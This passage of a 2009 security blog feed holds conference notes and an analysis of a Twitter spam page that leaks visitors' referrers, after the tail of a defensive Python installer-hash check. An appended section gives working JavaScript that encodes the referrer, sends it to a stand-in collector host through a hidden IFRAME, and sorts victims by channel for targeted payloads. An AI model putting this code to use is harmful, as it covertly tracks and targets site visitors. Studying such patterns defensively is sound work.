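    url = extract_installer_url(descriptor_xml)
    if url is None:
        return False, "descriptor has no installer URL"
    if not url_is_acceptable(url, allowed_hosts):
        return False, "installer URL violates policy: " + url
    name = urlparse(url).path.rsplit("/", 1)[-1]
    expected = pinned.get(name)
    if expected is None:
        return False, "no pinned hash for " + name
    actual = hashlib.sha256(installer_bytes).hexdigest()
    if not hmac.compare_digest(actual, expected):
        return False, "hash mismatch for " + name
    return True, "ok"


if __name__ == "__main__":
    # Descriptor as served: passes.
    print(verify_installer(SAMPLE_CLIENTS_XML, SAMPLE_INSTALLER))
    # Descriptor as an on-path attacker would rewrite it: rejected on the URL
    # check, before any bytes from 203.0.113.10 are even considered.
    rewritten = SAMPLE_CLIENTS_XML.replace(
        "https://vcenter.example.internal", "http://203.0.113.10")
    print(verify_installer(rewritten, SAMPLE_INSTALLER))
```
]]>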
        
    </content>
</entry>

<entry>
    <title>CONFidence09.02 - day 1 kicked off</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2009/11/confidence0902-day-1-kicked-off.html" />
    <id>tag:www.ctrl-alt-del.cc,2009://1.30</id>

    <published>2009-11-19T13:41:43Z</published>
    <updated>2009-11-19T14:22:21Z</updated>

    <summary>Almost half of the day at CONFidence09.02 has already passed. Some interesting stuff of course...Starting with Dragorn&apos;s and RenderMan&apos;s &quot;Wireless threats; They&apos;re not dead yet!&quot; we&apos;ve heard once again how bad and how dead WEP really is. Good refresher for...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="conferences" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="security" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="confidence" label="CONFidence" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[Almost half of the day at CONFidence09.02 has already passed. Some interesting stuff of course...<br /><br />Starting with Dragorn's and RenderMan's "Wireless threats; They're not dead yet!" we heard once again how bad and how dead WEP really is. A good refresher for some people I guess. The best part was discussing client side attacks via wifi - airpwn style but without goats this time, using malicious JS with such a nice feature as browser side caching, defeating SSL, hiding all of that in plain sight with a call-home feature that will be very hard to notice in most environments.<br /><br />Then I skipped several presentations - I really needed a reboot :-)<br /><br />The next one I made it to was Felix "FX" Lindner talking about how sweet hacking Cisco IOS can be. Frank (<a href="http://twitter.com/autonessus">@autonessus</a>) has <a href="http://www.cupfighter.net/index.php/2009/11/confidence0902-router-exploitation/">already blogged about this one</a> so I'll just put a few notes here.<br /><ul><li>Cisco's HTTP admin interface runs off their own understanding of HTTP and not Apache. </li><li>IOS doesn't have a recovery procedure for software crashes due to its monolithic structure - the only remedy is to reboot the whole box (quite easy to spot even by an untrained admin - the networkz are down!) which takes time (even several minutes).</li><li>Cisco has added TCL scripting in some versions of IOS :-)</li></ul><br />More to follow... and yes, we use <a href="http://search.twitter.com/search?q=%23confidence0902">#confidence0902 </a>as the hashtag.<br />]]>
        
    </content>
</entry>

<entry>
    <title>Twitter, SPAM and zombie hookers</title>
    <link rel="alternate" type="text/html" href="http://www.ctrl-alt-del.cc/2009/10/twitter-spam-and-zombie-hookers.html" />
    <id>tag:www.ctrl-alt-del.cc,2009://1.29</id>

    <published>2009-10-27T12:46:20Z</published>
    <updated>2009-10-27T14:25:56Z</updated>

    <summary> Came out of a blue - no context, nothing... BTW - we&apos;ve got new URL shortening service.All would be almost &apos;fine&apos; but WTF is that? Not that I wouldn&apos;t guess but I&apos;m just curious how owned you can get...</summary>
    <author>
        <name>Tomasz Miklas</name>
        
    </author>
    
        <category term="WTF" scheme="http://www.sixapart.com/ns/types#category" />
    
        <category term="security" scheme="http://www.sixapart.com/ns/types#category" />
    
    <category term="spam" label="SPAM" scheme="http://www.sixapart.com/ns/types#tag" />
    <category term="twitter" label="Twitter" scheme="http://www.sixapart.com/ns/types#tag" />
    
    <content type="html" xml:lang="en" xml:base="http://www.ctrl-alt-del.cc/">
        <![CDATA[<span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="twitspim.png" src="http://www.ctrl-alt-del.cc/2009/10/27/twitspim.png" class="mt-image-right" style="margin: 0pt 0pt 20px 20px; float: right;" height="51" width="322" /></span> Came out of the blue - no context, nothing... BTW - we've got a new URL shortening service.<br />All would be almost 'fine' but WTF is that? Not that I wouldn't guess but I'm just curious how owned you can get :-)<br /><br />As a matter of fact, you can get owned pretty bad and what I've seen I would expect to be just a starter... the main course is coming soon!<br /><br /><br /><div align="left"><b><font color="red">WARNING:</font></b> All the information provided in this post is available on the Internet. Links presented on screen shots should be considered malicious - <u>do not visit them unless you really know what you are doing</u>. You have been warned.<br /></div>]]>
        <![CDATA[<br /><b>Just as your mother told you...</b><br /><br />The best way IMHO to check stuff like that is the old school way...<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="GETscreen.jpg" src="http://www.ctrl-alt-del.cc/2009/10/27/GETscreen.jpg" class="mt-image-center" style="margin: 0pt auto 20px; text-align: center; display: block;" height="541" width="555" /></span>Looks broken, right... redirect ok - that's what I've expected, but then... hold on - the <i>Client-Peer</i> IP is not mine in any way... so who owns this one?<br /><br /><span class="mt-enclosure mt-enclosure-image" style="display: inline;"><img alt="whois.jpg" src="http://www.ctrl-alt-del.cc/2009/10/27/whois.jpg" class="mt-image-center" style="margin: 0pt auto 20px; text-align: center; display: block;" height="354" width="571" /></span>Isn't that just sweet? You go to a website and the traffic goes via a proxy somewhere in China. Well - that's not all in fact. Let's grab a clean VM, make a snapshot just in case, connect - let's see what a sexy girl has to offer, right?<br /><br /><b>NSFW</b><br /><br />Don't do that at work or you may get strange looks from people around (at best) ;-)<br /><br /><b>The Bait</b><br /><br />The page loads and looks like a blog - that's what the URL would suggest, but if you look in the source... I said THE SOURCE, not the boobs on the page!<br /><br />Right... in the source you find the gems. First of all the page is using a <b>GeoIP</b> JavaScript include from <a href="http://www.maxmind.com/">Maxmind</a> - we all know it works well - to give the reader a more personalized experience when you read the story (don't even tell me you are still looking at the photos - lol). As a result the page resolves that I connect from an IP address in London and that the poor girl comes from 'a small town near London , H9' and has to work as a stripper to pay her college fees...<br /><br />London, H9... hold on - <b>London doesn't have an H9 post code</b> (although on the page it looks like it was part of the address). GeoIP information is used in several places and looks quite... convincing... as long as you focus on the boobies... oh and forget about the fact that the bottom of the page says '<i>She is single boys!!!! She lives in my hometown of London</i>' - right, somebody doesn't even have a spell check :-] <br /><br /><b>The Shot</b><br /><br />Let's look at the gems on the top shelf... I don't have a lot of time to look at it properly, so just quick bullet points:<br />&nbsp;<br /><blockquote><ol><li>We have a JavaScript file that contains two functions 'encoding' their input. Well, kind of encoding, because it uses <i>ord()</i> to do it and it seems the author is not very skilled, but anyway - he/she managed to produce working code.</li><li>A call to the encode function with the referrer URL given as a parameter - why is someone trying to steal my referrer info?</li><li>The JavaScript prints out an IFRAME linking to an HTML file and passes the encoded string as a parameter. The file came back empty, but the GET string is left in their logs :-)</li></ol></blockquote>Getting the referrer string doesn't look that bad... right? Anyway, why do they want to know where I am coming from? Is that like SEO and affiliate tracking for malware? Interesting!<br /><br /> <b>Post Mortem</b><br /><br />Not much of it... As I said I don't have time to play with it properly and see if, for example, I actually get something from this 'empty' html file. It would be trivial to provide a further payload if the victim provides a properly encoded referrer string that is of the attacker's interest. <br />How effective would it be if the bad guys used this just to check via which channel the victim came to them (they can also find out which channels are the most successful - it's just like marketing campaigns)? The next logical step would be to provide a customized exploit - if the victim came from Twitter do bad stuff to a Twitter user, Facebook - get them owned on Facebook, etc.<br /><br />Surely the guys are learning and their intentions are not good. Keep an eye out and don't get yourself fooled!<br />]]>
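        <![CDATA[<br /><b>Added example: the referrer-leak pattern in working code</b><br /><br />The three bullet points under <i>The Shot</i> describe the mechanism in prose; what follows is an added, constructed illustration of that pattern, not the script from the page examined in the post. The <i>ord()</i>-style obfuscation is reproduced as a hex dump of UTF-16 code units, the collector URL <i>http://collector.example/track.html</i>, the parameter name <i>r</i> and all function names are hypothetical, and the referrer is passed in as an argument instead of being read from <i>document.referrer</i> so the code runs under Node.js outside a browser. The last function carries the post's 'next logical step' through: classifying the recovered referrer by inbound channel so a per-site payload could be chosen.<br /><br />

```javascript
// Constructed illustration of the referrer-exfiltration pattern described in
// the post: a trivial character-code "encoding" of document.referrer, smuggled
// to the attacker's server as a GET parameter on a hidden IFRAME's src.
// Collector URL, parameter name and function names are hypothetical; this is
// not the sample's actual code.

const COLLECTOR = "http://collector.example/track.html"; // hypothetical

// "Encoding" of the kind the post describes: every UTF-16 code unit becomes
// its numeric value (what PHP's ord() gives for bytes), zero-padded to four
// hex digits so the collector can split it back apart. Obfuscation, not
// encryption: anyone reading the access log can reverse it.
function encodeReferrer(s) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    out += s.charCodeAt(i).toString(16).padStart(4, "0");
  }
  return out;
}

// Server side: undo the padding. Rejects anything that is not a whole number
// of 4-hex-digit groups, so garbage in the log does not decode into garbage.
function decodeReferrer(enc) {
  if (enc.length % 4 !== 0 || !/^[0-9a-f]*$/i.test(enc)) {
    throw new Error("malformed encoded referrer");
  }
  let out = "";
  for (let i = 0; i < enc.length; i += 4) {
    out += String.fromCharCode(parseInt(enc.slice(i, i + 4), 16));
  }
  return out;
}

// What the injected script writes into the page: an invisible IFRAME whose
// src carries the encoded referrer. In a browser this would be
// document.write(buildIframe(document.referrer)); the referrer is a parameter
// here so the function runs outside a browser.
function buildIframe(referrer) {
  const enc = encodeReferrer(referrer);
  return '<iframe src="' + COLLECTOR + "?r=" + enc +
         '" width="1" height="1" style="display:none"></iframe>';
}

// What lands on the collector: the query string. Pull the parameter out of
// the frame markup the way the server would read it from its request log.
// The HTML file itself can stay empty; the GET line is the payload.
function extractReferrerFromIframe(html) {
  const m = /[?&]r=([0-9a-f]+)/i.exec(html);
  return m ? decodeReferrer(m[1]) : null;
}

// The post's "next logical step": decide which payload a victim should get
// based on where they came from. An empty or unparsable referrer means a
// direct visit, which the attacker cannot attribute to any campaign.
function classifyChannel(referrer) {
  let host;
  try {
    host = new URL(referrer).hostname.toLowerCase();
  } catch (e) {
    return "direct";
  }
  if (host === "twitter.com" || host.endsWith(".twitter.com")) return "twitter";
  if (host === "facebook.com" || host.endsWith(".facebook.com")) return "facebook";
  return "other";
}

// Demo on a constructed referrer, the way a click from Twitter would arrive.
const sampleReferrer = "http://twitter.com/home"; // constructed input
const injected = buildIframe(sampleReferrer);
const recovered = extractReferrerFromIframe(injected);
console.log(injected);
console.log("collector sees:", recovered, "->", classifyChannel(recovered));
```

<br />Run it with <i>node</i>; the demo at the bottom prints the injected IFRAME and what the collector recovers from it. One caveat worth keeping in mind: a referring site that sets <i>Referrer-Policy: strict-origin-when-cross-origin</i> (the browser default today) still sends the origin on cross-site navigations, which is all the channel classifier above needs; only <i>no-referrer</i> or <i>same-origin</i> on the referring side denies the attacker that signal.<br />]]>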
    </content>
</entry>

</feed>
